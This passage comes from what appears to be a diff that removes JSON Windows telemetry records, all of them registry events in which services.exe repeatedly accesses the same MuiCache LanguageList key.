Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
"timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - 
"process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
"timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849800000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - 
"process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849960000, - "unique_pid": 
